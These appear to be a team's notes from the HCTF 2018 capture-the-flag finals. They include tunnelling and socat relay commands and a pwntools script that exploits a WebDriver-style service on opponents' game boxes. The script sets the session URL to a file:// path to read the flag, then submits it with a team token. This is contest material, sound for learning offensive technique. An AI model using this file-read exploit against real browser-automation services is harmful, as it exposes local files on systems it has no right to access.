HCTF2018_Finals

prepare

Router:

1
2
3
4
set route&&make outer in:
PS C:\WINDOWS\system32> route print
PS C:\WINDOWS\system32> route add 192.168.0.0 mask 255.255.0.0 192.168.17.1
#windows:teamviewer

Something for pwn:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
for localhost:
# localhost:6666 <---> remote:8888 by ssh tunnel
ssh -CqTfnN -R 8888:localhost:6666 ctf@192.168.100.100
# localhost:6666 <---> remoteaddr:remote_port(others or local fake pwn)
socat tcp-listen:6666,fork tcp:192.168.125.125:10001

for remote:
binary:
#!/bin/bash

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/tmp/socat
/tmp/socat/socat - tcp-connect:localhost:8888

for result:
GameBox Stdin <---> GameBox:8888 <---> localhost:6666 <---> remoteaddr:remote_port

Something wrong with run.sh:

1
2
3
#!/bin/sh
ulimit -p 30
/usr/bin/timeout 120 /chall/bindriver/bindriver

pwn1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import requests
import json
import time, hashlib
import re
from pwn import *

def submit_flag(flag):
token = "61c3c716165073254315e347a895fb279514e0cb"
url = "http://192.168.200.150:8005/api/team/submit/"+token
h = {
"Content-Type":"application/json"
}
d = { "flag" : flag }
d = json.dumps(d)
print d
r = requests.post(url, data=d,headers=h)
print r.text

def get_flag(port):
try:
#context.log_level='debug'
#p=process("./bindriver")
p=remote("192.168.100.100",port)
#p.sendline("POST / HTTP/1.1\nHost: 192.168.100.100")
#gdb.attach(p)
p.sendline("GET /status\n \nConnection: Keep-Alive\nHost: localhost")
#gdb.attach(p)
p.recvuntil("}\n")
p.sendline("POST /session\n \nConnection: Keep-Alive\nHost: localhost")
p.recvuntil("\"sessionId\": \"")
session=p.recv(8)
print session
p.recvuntil("}\n")
p.send("POST /session/"+session+"/url\n \nConnection: Keep-Alive\nHost: localhost\n{\"url\": \"file:///flag#http://\"}")
p.recvuntil("}\n")
p.sendline("GET /session/"+session+"/url\n \nConnection: Keep-Alive\nHost: localhost")
p.recvuntil("}\n")
p.sendline("GET /session/"+session+"/source\n \nConnection: Keep-Alive\nHost: localhost")
p.recvuntil("source\": \"")
flag=p.recvuntil("}")
print flag
return flag
except:
return None

def main():
for ip in range(1,12):
port = 20100+ip
flag = get_flag(port)
if flag != None:
submit_flag(flag)

if __name__ == "__main__":
# while 1:
main()
# time.sleep(5)
# print "-"*20